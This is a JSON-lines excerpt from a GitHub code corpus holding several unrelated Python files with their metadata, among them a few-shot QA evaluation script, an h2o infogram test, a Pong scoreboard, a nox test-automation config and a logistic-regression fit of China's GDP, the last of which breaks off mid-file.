{"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "19171370661", "text": "import os\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom utils import *\nfrom dataset_utils import read_wikiqa_data, f1auc_score, wiki_evaluation\nfrom comp_utils import safe_completion, length_of_prompt, conditional_strip_prompt_prefix\nfrom prompt_helper import get_joint_prompt_helper\n\n# TEST_PART = 250\n\n_MAX_TOKENS = 144\n\n# PROMOT CONTROL\nPE_STYLE_SEP = \" The reason is as follows.\"\nEP_STYLE_SEP = \" The answer is\"\nEP_POSSIBLE_SEP_LIST = [\n \" The answer is\",\n \" First, the answer is\",\n \" Second, the answer is\",\n \" Third, the answer is\"\n]\n\ndef _parse_args():\n parser = argparse.ArgumentParser()\n add_engine_argumenet(parser)\n\n parser.add_argument('--style', type=str, default=\"e-p\")\n parser.add_argument('--annotation', type=str, default=\"std\")\n parser.add_argument('--run_prediction', default=False, action='store_true')\n parser.add_argument('--run_length_test', default=False, action='store_true')\n parser.add_argument('--num_distractor', type=int, default=2, help=\"number of distractors to include\")\n parser.add_argument('--num_shot', type=int, default=6)\n parser.add_argument('--train_slice', type=int, default=0)\n parser.add_argument('--num_dev', type=int, default=308)\n parser.add_argument('--dev_slice', type=int, default=0)\n parser.add_argument('--show_result', default=False, action='store_true')\n parser.add_argument('--model', type=str, default=\"gpt3\")\n parser.add_argument('--with_context', default=False, action='store_true')\n\n args = parser.parse_args()\n specify_engine(args)\n args.helper = get_joint_prompt_helper(args.style)\n return args\n\ndef result_cache_name(args):\n return \"misc/manual__tr{}-{}_dv{}-{}_predictions.json\".format(\n args.train_slice, args.train_slice + args.num_shot, args.dev_slice, args.num_dev)\n\ndef in_context_manual_prediction(ex, training_data, engine, prompt_helper, length_test_only=False):\n prompt, stop_signal = prompt_helper.prompt_for_joint_prediction(ex, training_data)\n if length_test_only:\n pred = length_of_prompt(prompt, _MAX_TOKENS)\n print(prompt)\n return pred\n else:\n pred = safe_completion(engine, prompt, _MAX_TOKENS, stop_signal, temp=0.0, logprobs=5) \n if pred != None: \n pred[\"prompt\"] = prompt \n pred[\"id\"] = ex[\"id\"]\n if len(pred[\"text\"]) > len(prompt):\n pred[\"text\"] = pred[\"text\"][len(prompt):]\n else:\n pred[\"text\"] = \"null\"\n pred[\"completion_offset\"] = len(prompt)\n return pred\n\ndef evaluate_manual_predictions(dev_set, predictions, style=\"p-e\", do_print=False):\n acc_records = []\n rat_records = []\n f1_records, pre_records, rec_records = [], [], []\n logprob_records = []\n ansprob_records = []\n \n for idx, (ex, pred) in enumerate(zip(dev_set, predictions)):\n p_ans = pred['answer']\n acc, (f1, pre, rec), gt_ans = wiki_evaluation(p_ans, ex[\"answer\"])\n acc_records.append(acc)\n rat_acc = False\n rat_records.append(rat_acc)\n f1_records.append(f1), pre_records.append(pre), rec_records.append(rec)\n logprob_records.append(pred['joint_lobprob'])\n ansprob_records.append(pred['answer_logprob'])\n if do_print and not acc:\n print(\"--------------{} EX {} RAT {} F1 {:.2f}--------------\".format(idx, acc, rat_acc, f1))\n print(ex['question'])\n print('\\nRAW TEXT', '[' + pred['text'].strip() + ']')\n print('PR ANS:', p_ans)\n print('GT ANS:', gt_ans)\n print(json.dumps({'qas_id': ex['id'], 'answer': p_ans}))\n\n mean_of_array = lambda x: sum(x) / len(x)\n print(\"EX\", mean_of_array(acc_records), \"RAT\", mean_of_array(rat_records))\n print(\"F1: {:.2f}\".format(mean_of_array(f1_records)), \n \"PR: {:.2f}\".format(mean_of_array(pre_records)),\n \"RE: {:.2f}\".format(mean_of_array(rec_records)))\n print(\"Acc-Cov AUC: {:.2f}\".format(f1auc_score(\n ansprob_records, acc_records)))\n \ndef test_few_shot_manual_prediction(args):\n print(\"Running prediction\")\n train_set = read_wikiqa_data(f\"data/train_subset.json\", manual_annotation_style=args.style)\n train_set = train_set[args.train_slice:(args.train_slice + args.num_shot)]\n print('len(train_set): ', len(train_set))\n dev_set = read_wikiqa_data(f\"data/dev_sampled.json\")\n dev_set = dev_set[args.dev_slice:(args.num_dev)]\n\n prompt, _ = args.helper.prompt_for_joint_prediction(dev_set[0], train_set)\n print('prompt: ')\n print(prompt)\n\n if os.path.exists(result_cache_name(args)) and not args.run_length_test:\n predictions = read_json(result_cache_name(args))\n else:\n predictions = [] \n for i, x in enumerate(tqdm(dev_set, total=len(dev_set), desc=\"Predicting\")):\n pred = in_context_manual_prediction(x, train_set, engine=args.engine, prompt_helper=args.helper, length_test_only=args.run_length_test)\n if pred != None:\n predictions.append(pred)\n else:\n print('ENDING EARLY')\n args.num_dev = i + args.dev_slice\n dump_json(predictions, result_cache_name(args))\n raise Exception('end')\n\n\n if args.run_length_test:\n print(result_cache_name(args))\n print('MAX', max(predictions), 'COMP', _MAX_TOKENS)\n return\n # save\n # read un indexed dev\n dump_json(predictions, result_cache_name(args)) \n [args.helper.post_process(p) for p in predictions]\n # acc\n evaluate_manual_predictions(dev_set, predictions, args.style, do_print=True)\n print(result_cache_name(args))\n\nif __name__=='__main__':\n args = _parse_args()\n test_few_shot_manual_prediction(args)", "repo_name": "RuochenZhao/Verify-and-Edit", "sub_path": "2WikiMultihopQA/manual_joint.py", "file_name": "manual_joint.py", "file_ext": "py", "file_size_in_byte": 5789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "prompt_helper.get_joint_prompt_helper", "line_number": 44, "usage_type": "call"}, {"api_name": "prompt_helper.prompt_for_joint_prediction", "line_number": 52, "usage_type": "call"}, {"api_name": "comp_utils.length_of_prompt", "line_number": 54, "usage_type": "call"}, {"api_name": "comp_utils.safe_completion", "line_number": 58, "usage_type": "call"}, {"api_name": "dataset_utils.wiki_evaluation", "line_number": 78, "usage_type": "call"}, {"api_name": "dataset_utils.f1auc_score", "line_number": 98, "usage_type": "call"}, {"api_name": "dataset_utils.read_wikiqa_data", "line_number": 103, "usage_type": "call"}, {"api_name": "dataset_utils.read_wikiqa_data", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "13349239574", "text": "import os\nimport sys\nsys.path.insert(1, os.path.join(\"..\",\"..\",\"..\"))\nimport h2o\nfrom h2o.estimators.infogram import H2OInfogram\nfrom tests import pyunit_utils\n \ndef test_infogram_personal_loan_plot():\n \"\"\"\n checking plotting function of infogram for fair model\n \"\"\"\n fr = h2o.import_file(path=pyunit_utils.locate(\"smalldata/admissibleml_test/Bank_Personal_Loan_Modelling.csv\"))\n target = \"Personal Loan\"\n fr[target] = fr[target].asfactor()\n x = [\"Experience\",\"Income\",\"Family\",\"CCAvg\",\"Education\",\"Mortgage\",\n \"Securities Account\",\"CD Account\",\"Online\",\"CreditCard\"]\n infogram_model = H2OInfogram(seed = 12345, protected_columns=[\"Age\",\"ZIP Code\"])\n infogram_model.train(x=x, y=target, training_frame=fr)\n infogram_model.plot(server=True)\n\n infogram_model2 = H2OInfogram(seed = 12345, protected_columns=[\"Age\",\"ZIP Code\"], safety_index_threshold=0.05,\n relevance_index_threshold=0.05)\n infogram_model2.train(x=x, y=target, training_frame=fr)\n infogram_model2.plot(server=True)\n assert len(infogram_model.get_admissible_cmi()) <= len(infogram_model2.get_admissible_cmi())\n \nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_infogram_personal_loan_plot)\nelse:\n test_infogram_personal_loan_plot()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_algos/infogram/pyunit_PUBDEV_8075_safe_infogram_personal_loan_plot.py", "file_name": "pyunit_PUBDEV_8075_safe_infogram_personal_loan_plot.py", "file_ext": "py", "file_size_in_byte": 1302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "h2o.import_file", "line_number": 12, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 12, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 12, "usage_type": "name"}, {"api_name": "h2o.estimators.infogram.H2OInfogram", "line_number": 17, "usage_type": "call"}, {"api_name": "h2o.estimators.infogram.H2OInfogram", "line_number": 21, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 28, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "73205334593", "text": "from turtle import Turtle, Screen\nfrom enum import Enum, unique\n\n\n@unique\nclass Player(Enum):\n PLAYER_A = 1\n PLAYER_B = 2\n\n\nFONT = (\"Courier\", 80, \"normal\")\nALIGN = \"center\"\n\n\nclass Scoreboard(Turtle):\n def __init__(self, screen: Screen):\n super(Scoreboard, self).__init__()\n self.speed(\"fastest\")\n self.color(\"white\")\n self.playerAScore = 0\n self.playerBScore = 0\n self.hideturtle()\n self.playerALocation = (-screen.window_width() / 2, screen.window_height() / 2)\n self.playerBLocation = (-screen.window_width() / 2, screen.window_height() / 2)\n self.__display_score()\n\n def inc_score(self, player: Player):\n if player is Player.PLAYER_A:\n self.playerAScore += 1\n else:\n self.playerBScore += 1\n self.__display_score()\n\n def new_game(self):\n self.playerAScore = 0\n self.playerBScore = 0\n self.__display_score()\n\n def set_lplayer_score_location(self, *loc):\n self.playerALocation = loc\n self.__display_score()\n\n def set_rplayer_score_location(self, *loc):\n self.playerBLocation = loc\n self.__display_score()\n\n def __display_score(self):\n self.clear()\n self.penup()\n self.goto(self.playerALocation)\n self.write(self.playerAScore, align=ALIGN, font=FONT)\n self.goto(self.playerBLocation)\n self.write(self.playerBScore, align=ALIGN, font=FONT)\n\n\n\n\n\n\n\n", "repo_name": "KuoPingL/100DaysOfPython", "sub_path": "day_22_pong/scoreboard.py", "file_name": "scoreboard.py", "file_ext": "py", "file_size_in_byte": 1468, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "enum.Enum", "line_number": 6, "usage_type": "name"}, {"api_name": "enum.unique", "line_number": 5, "usage_type": "name"}, {"api_name": "turtle.Turtle", "line_number": 15, "usage_type": "name"}, {"api_name": "turtle.Screen", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "7147751293", "text": "from django.conf.urls import url\n\nfrom .views import (\n livro,\n criarLivro,\n alteraLivro,\n deletaLivro\n)\n\nurlpatterns = [\n url(r'^$', livro, name='livro_lista'),\n url(r'^criar/$', criarLivro, name='livro_criar'),\n url(r'^(?P\\d+)/alterar/$', alteraLivro, name='livro_alterar'),\n url(r'^(?P\\d+)/deletar/$', deletaLivro, name='livro_deletar'),\n]\n", "repo_name": "rafaelribeiroo/pyBook", "sub_path": "src/books/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 375, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "views.livro", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "views.criarLivro", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "views.alteraLivro", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "views.deletaLivro", "line_number": 14, "usage_type": "argument"}]} +{"seq_id": "10194751886", "text": "import requests\n\n\nclass WebInteractive:\n @staticmethod\n def clean_req_data(req_data):\n req_data_pop = []\n\n for k in ['data', 'params']:\n if k in req_data.keys():\n data = req_data.get(k) # type: dict\n if data is not None:\n data_pop = []\n for _k, v in data.items():\n if v is None:\n data_pop.append(_k)\n for i in data_pop:\n data.pop(i)\n else:\n req_data_pop.append(k)\n\n for i in req_data_pop:\n req_data.pop(i)\n\n return req_data\n\n @staticmethod\n def request(method: str, url):\n method = method.upper()\n\n def core(func):\n def _core(*args, **kwargs):\n req_data = func(*args, **kwargs) # type: dict\n req_data = WebInteractive.clean_req_data(req_data)\n url_args = req_data.get('url_args')\n req_data.pop('url_args')\n\n if url_args is not None and len(url_args) > 0:\n req_url = url % url_args\n else:\n req_url = url\n\n if method == 'GET':\n resp = requests.get(req_url, **req_data)\n elif method == 'POST':\n resp = requests.post(req_url, **req_data)\n else:\n resp = None\n\n return resp\n\n return _core\n\n return core\n\n @staticmethod\n def response(attr, encoding=None, params=None):\n def core(func):\n def _core(*args, **kwargs):\n resp = func(*args, **kwargs) # type: requests.Response\n if resp is not None:\n if encoding is not None:\n resp.encoding = encoding\n result = getattr(resp, attr)\n if callable(result):\n if params is not None:\n result = result(**params)\n else:\n result = result()\n else:\n result = None\n\n return result\n\n return _core\n\n return core\n", "repo_name": "HsOjo/ResourceUpdateTest", "sub_path": "utils/web_interactive.py", "file_name": "web_interactive.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 44, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "5719342401", "text": "\"\"\"\nPerform test automation with nox.\n\nFor further details, see https://nox.thea.codes/en/stable/#\n\n\"\"\"\n\nfrom hashlib import sha256\nimport os\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\nimport nox\n\n\n#: Default to reusing any pre-existing nox environments.\nnox.options.reuse_existing_virtualenvs = True\n\n#: Name of the package to test.\nPACKAGE = Path(\"iris_ugrid\").absolute()\n\n#: Cirrus-CI environment variable hook.\nPY_VER = os.environ.get(\"PY_VER\", \"3.7\")\n\n# Git commit of iris that iris-ugrid depends on.\nwith Path(\"requirements\").joinpath(\"manual\", \"iris_commit.txt\").open() as fi:\n IRIS_COMMIT = fi.read().strip()\n\n\ndef venv_cached(session, cache_info_path, env_spec_path, iris_commit):\n \"\"\"\n Determine whether the nox session environment has been cached.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n cache_info_path: Path\n A Path object pointing to the expected directory that would contain\n cache info.\n\n env_spec_path: pathlib.Path\n A Path object pointing to the conda env spec YAML for Iris-ugrid.\n\n iris_commit : str\n The string for the Iris commit Iris-ugrid is dependent on.\n\n Returns\n -------\n bool\n Whether the session has been cached.\n\n \"\"\"\n result = False\n\n cache_env_spec = cache_info_path / env_spec_path.name\n cache_iris_commit = cache_info_path / \"iris-commit\"\n caches_found = all(\n [file.is_file() for file in (cache_env_spec, cache_iris_commit)]\n )\n\n if caches_found:\n with env_spec_path.open(\"rb\") as fi:\n expected = sha256(fi.read()).hexdigest()\n with cache_env_spec.open(\"r\") as fi:\n actual = fi.read()\n ok_env_spec = actual == expected\n\n expected = iris_commit\n with cache_iris_commit.open(\"r\") as fi:\n actual = fi.read()\n ok_iris_commit = actual == expected\n\n result = ok_env_spec and ok_iris_commit\n\n return result\n\n\ndef cache_venv(session, cache_info_path, env_spec_path, iris_commit):\n \"\"\"\n Cache the nox session environment.\n\n This consists of saving a hexdigest (sha256) of the associated\n conda requirements YAML file.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n cache_info_path: pathlib.Path\n A Path object denoting the directory that cache info should be written\n to.\n\n env_spec_path: pathlib.Path\n A Path object pointing to the conda env spec YAML for Iris-ugrid.\n\n iris_commit: str\n The string for the Iris commit Iris-ugrid is dependent on.\n\n \"\"\"\n if not cache_info_path.is_dir():\n cache_info_path.mkdir()\n\n with env_spec_path.open(\"rb\") as fi:\n hexdigest = sha256(fi.read()).hexdigest()\n cache_env_spec = cache_info_path / env_spec_path.name\n with cache_env_spec.open(\"w+\") as fo:\n fo.write(hexdigest)\n\n cache_iris_commit = cache_info_path / \"iris-commit\"\n with cache_iris_commit.open(\"w+\") as fo:\n fo.write(iris_commit)\n\n\n@nox.session\ndef flake8(session):\n \"\"\"\n Perform flake8 linting of iris-ugrid.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n \"\"\"\n # Pip install the session requirements.\n session.install(\"flake8\")\n # Execute the flake8 linter on the package.\n session.run(\"flake8\", str(PACKAGE))\n # Execute the flake8 linter on this file.\n session.run(\"flake8\", __file__)\n\n\n@nox.session\ndef black(session):\n \"\"\"\n Perform black format checking of iris-ugrid.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n \"\"\"\n # Pip install the session requirements.\n session.install(\"black==19.10b0\")\n # Execute the black format checker on the package.\n session.run(\"black\", \"--check\", str(PACKAGE))\n # Execute the black format checker on this file.\n session.run(\"black\", \"--check\", __file__)\n\n\n@nox.session(python=[PY_VER], venv_backend=\"conda\")\ndef tests(session):\n \"\"\"\n Perform iris-ugrid tests.\n\n Parameters\n ----------\n session: object\n A `nox.sessions.Session` object.\n\n Notes\n -----\n See\n - https://github.com/theacodes/nox/issues/346\n - https://github.com/theacodes/nox/issues/260\n\n \"\"\"\n INSTALL_DIR = Path().cwd().absolute()\n env_spec_self = (\n INSTALL_DIR\n / \"requirements\"\n / \"ci\"\n / f\"py{PY_VER.replace('.', '')}.yml\"\n )\n\n IRIS_DIR = Path(session.virtualenv.location) / \"iris\"\n\n cache_info_path = Path(session.virtualenv.location) / \"nox_cache_info\"\n if not venv_cached(session, cache_info_path, env_spec_self, IRIS_COMMIT):\n\n def conda_env_update(env_spec_path):\n # Back-door approach to force nox to use \"conda env update\".\n command = (\n f\"conda env update --prefix={session.virtualenv.location} \"\n f\"--file={env_spec_path}\"\n )\n command = command.split(\" \")\n session._run(*command, silent=True, external=\"error\")\n\n # Download Iris.\n github_archive_url = (\n f\"https://github.com/SciTools/iris/archive/{IRIS_COMMIT}.zip\"\n )\n iris_zip = Path(urlretrieve(github_archive_url, \"iris.zip\")[0])\n with ZipFile(iris_zip, \"r\") as zip_open:\n zip_open.extractall()\n if IRIS_DIR.is_dir():\n rmtree(IRIS_DIR)\n Path(f\"iris-{IRIS_COMMIT}\").rename(IRIS_DIR)\n iris_zip.unlink()\n\n # Install Iris dependencies.\n env_spec_iris = (\n IRIS_DIR\n / \"requirements\"\n / \"ci\"\n / f\"py{PY_VER.replace('.', '')}.yml\"\n )\n conda_env_update(env_spec_iris)\n\n # Configure Iris.\n site_cfg_content = [\n \"[Resources]\",\n f\"test_data_dir = {os.environ['IRIS_TEST_DATA_DIR']}/test_data\",\n f\"doc_dir = {IRIS_DIR / 'docs' / 'iris'}\",\n \"[System]\",\n f\"udunits2_path = {session.virtualenv.location}/lib/libudunits2.so\",\n ]\n site_cfg_path = IRIS_DIR / \"lib\" / \"iris\" / \"etc\" / \"site.cfg\"\n with site_cfg_path.open(\"w+\") as site_cfg:\n site_cfg.writelines(line + \"\\n\" for line in site_cfg_content)\n\n # Install Iris.\n os.chdir(IRIS_DIR)\n session.run(*\"python setup.py install\".split(\" \"), silent=True)\n\n #######################################################################\n\n # Install dependencies.\n conda_env_update(env_spec_self)\n\n cache_venv(session, cache_info_path, env_spec_self, IRIS_COMMIT)\n\n session.run(\"pytest\", \"-v\", str(PACKAGE))\n", "repo_name": "SciTools-incubator/iris-ugrid", "sub_path": "noxfile.py", "file_name": "noxfile.py", "file_ext": "py", "file_size_in_byte": 6723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nox.options", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 67, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 109, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 119, "usage_type": "attribute"}, {"api_name": "nox.session", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 174, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 182, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 184, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 200, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 200, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 201, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 204, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 205, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 220, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 230, "usage_type": "call"}, {"api_name": "nox.session", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "4304945842", "text": "import pathlib\n\nimport numpy as np\nimport pandas as pd\n\nfrom core import dataloader\nfrom core import helper\nimport sklearn\nfrom sklearn.metrics import classification_report\nimport argparse\nimport time\ntimer = time.perf_counter\n\nparser = argparse.ArgumentParser(description='time series classifiers as stopper.')\nparser.add_argument(\n 'window_size', type=int, help='window size for classifers'\n)\nparser.add_argument(\n 'step_size', type=int, help='step size for classifers'\n)\nargs = parser.parse_args()\nprint(args)\n\nTRAIN_DATA_PATH = pathlib.Path(\"./data/testing/real_world_data\")\ntraining_set = dataloader.TrainingLogDataset(TRAIN_DATA_PATH)\ntraining_set.loadDataset()\n\nOUT_PATH = pathlib.Path(\"./out/test_cmp_early_stop_step10\")\nOUT_PATH.mkdir(exist_ok=True)\nprint(training_set)\n\nmodels_path = pathlib.Path(\"./models\")\nfor cls_name in [\"tsf\", \"tsbf\", \"bossvs\", \"hmmgmm\", \"saxvsm\", \"knndtw\"]:\n print(\"=\"*9, cls_name, \"=\"*9)\n model_path = list(models_path.glob(f\"{cls_name}_*.pkl\"))[0]\n model = helper.readPkl(model_path)\n\n classifier_window = args.window_size\n step = args.step_size\n\n def addInfo(classifier_stop_res):\n dst_len = len(classifier_stop_res[\"is_stopped\"])\n classifier_stop_res[\"label\"] = training_set.labels[:dst_len]\n classifier_stop_res[\"name\"] = training_set.names[:dst_len]\n classifier_stop_res[\"window_size\"] = [classifier_window] * dst_len\n classifier_stop_res[\"step\"] = [step] * dst_len\n return classifier_stop_res\n\n classifier_stop_res = {\n \"is_stopped\": [],\n \"stop_epoch\": [],\n \"best_epoch\": [],\n \"best_loss\": [],\n \"total_time\": [],\n \"timer_count\": [],\n }\n for idx, name in enumerate(training_set.names):\n idx = training_set.names.index(name)\n cur_data = training_set.data[idx]\n total_time = 0\n timer_count = 0\n for i in range(0, len(cur_data[\"monitor_metric\"]) - classifier_window + step, step):\n end_epoch = i + classifier_window\n window_data = {n: d[i:end_epoch] for n, d in cur_data.items()}\n processed_data = model.preprocessor.process([window_data])\n t1 = timer()\n res = model.predict(processed_data)\n t2 = timer()\n total_time += t2 - t1\n timer_count += 1\n if res:\n best_epoch = np.argmin(cur_data[\"monitor_metric\"][:end_epoch])\n best_loss = cur_data[\"monitor_metric\"][best_epoch]\n classifier_stop_res[\"is_stopped\"].append(1)\n classifier_stop_res[\"stop_epoch\"].append(end_epoch - 1)\n break\n else:\n best_epoch = np.argmin(cur_data[\"monitor_metric\"])\n best_loss = cur_data[\"monitor_metric\"][best_epoch]\n classifier_stop_res[\"is_stopped\"].append(0)\n classifier_stop_res[\"stop_epoch\"].append(len(cur_data[\"monitor_metric\"]) - 1)\n classifier_stop_res[\"best_epoch\"].append(best_epoch)\n classifier_stop_res[\"best_loss\"].append(best_loss)\n classifier_stop_res[\"total_time\"].append(total_time)\n classifier_stop_res[\"timer_count\"].append(timer_count)\n # break\n if idx % 50 == 0:\n print(f\"{idx}/{len(training_set.names)}\")\n classifier_stop_res = addInfo(classifier_stop_res)\n tmp = pd.DataFrame.from_dict(classifier_stop_res)\n tmp.to_csv(OUT_PATH / f\"{model_path.stem}_{classifier_window}_{step}.csv\", index=False)\n classifier_stop_res = addInfo(classifier_stop_res)\n classifier_stop_res = pd.DataFrame.from_dict(classifier_stop_res)\n classifier_stop_res.to_csv(OUT_PATH / f\"{model_path.stem}_{classifier_window}_{step}.csv\", index=False)\n", "repo_name": "OverfitGuard/OverfitGuard", "sub_path": "classifier_as_stopper.py", "file_name": "classifier_as_stopper.py", "file_ext": "py", "file_size_in_byte": 3727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.perf_counter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 24, "usage_type": "call"}, {"api_name": "core.dataloader.TrainingLogDataset", "line_number": 25, "usage_type": "call"}, {"api_name": "core.dataloader", "line_number": 25, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "core.helper.readPkl", "line_number": 36, "usage_type": "call"}, {"api_name": "core.helper", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 90, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "attribute"}]} +{"seq_id": "39591765978", "text": "\"\"\"\nСоздает базу игр по ТОП Тесеры (без дубликатов)\n\"\"\"\n\nimport sqlite3\nimport json\n\nbase = sqlite3.connect(fr'../filters/Tesera_Top5000_1.db') # создание базы\ncur = base.cursor()\n\nwith open(fr'../TopList/Top5000_2.json') as file:\n games = json.load(file)\nstr_key_list = ', '.join([x for x in games[0].keys()][1:])\n# создание строки с именами ключей для названия столбцов таблицы\n\nbase.execute(f'CREATE TABLE IF NOT EXISTS data (id PRIMARY KEY, {str_key_list})') # создание столбцов таблицы\n\nfor number, game in enumerate(games):\n print(number)\n try:\n cur.execute(f'INSERT INTO data VALUES({\", \".join(\"?\"*len(game))})', [value for value in game.values()])\n except Exception as ex:\n print(ex)\n # заполнение таблицы\nbase.commit()\n", "repo_name": "Vansanych/BGG_Database", "sub_path": "SQL/SQL_Top_Tesera3.py", "file_name": "SQL_Top_Tesera3.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "42607629754", "text": "\"\"\" \n\n The following program uses non-linear regression to analyze china's GDP over the years 1960-2014.\n The dataset has two columns the first one contains the year while the 2nd contains the annual GDP in US $.\n\n\n\"\"\"\n# DEPENDENCIES\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n\n# IMPORTING DATASET\n\ndf = pd.read_csv(\"china_gdp.csv\")\n# print(df.head(10))\n\nx_data, y_data = (df[\"Year\"].values, df[\"Value\"].values)\n\n# VISUALIZING THE DATASET TO CHOOSE THE BEST REGRESSION\n\"\"\" \nplt.figure(figsize=(8, 5))\nplt.plot(x_data, y_data, 'ro')\nplt.ylabel('GDP')\nplt.xlabel('Year')\nplt.show() \"\"\"\n\n# The graph closely resembles to that of an logistic function . Hence it would be best to use logistic regression\n# since the growth is slow in the beginning then there is growth in the middle and then it dies.\n\n\"\"\" \n The formula for logistic regression is : y = 1 / 1 + e^(a(X-b)) where\n a controls the curves steepness\n b glides the graph over the x axis\n\n\"\"\"\n\n\ndef sigmoid(x, beta_1, beta_2):\n y = 1/(1+np.exp(-beta_1*(x-beta_2)))\n return y\n\n\nbeta_1 = 0.1\nbeta_2 = 1990\n\n# EXAMPLE OF A SAMPLE SIGMOID FUNCTION`\n\n\"\"\" y_pred = sigmoid(x_data,beta_1,beta_2)\nplt.plot(x_data, y_pred*15000000000000.)\nplt.plot(x_data, y_data, 'ro')\nplt.show() \"\"\"\n\n# NORMALIZATION OF DATA\n\nxdata = x_data/max(x_data)\nydata = y_data/max(y_data)\n\n\n\"\"\" \n we can use __curve_fit__ which uses non-linear least squares to fit our sigmoid function, to data.\n Optimal values for the parameters so that the sum of the squared residuals of sigmoid(xdata, *popt) - ydata is minimized.\n\n\"\"\"\npopt, pcov = curve_fit(sigmoid, xdata, ydata)\n#print the final parameters\n# print(\" beta_1 = %f, beta_2 = %f\" % (popt[0], popt[1])) The best parameters are \n\n# TO VISUALIZE THE PLOT \n\n\"\"\" x = np.linspace(1960, 2015, 55)\nx = x/max(x)\nplt.figure(figsize=(8,5))\ny = sigmoid(x, *popt)\nplt.plot(xdata, ydata, 'ro', 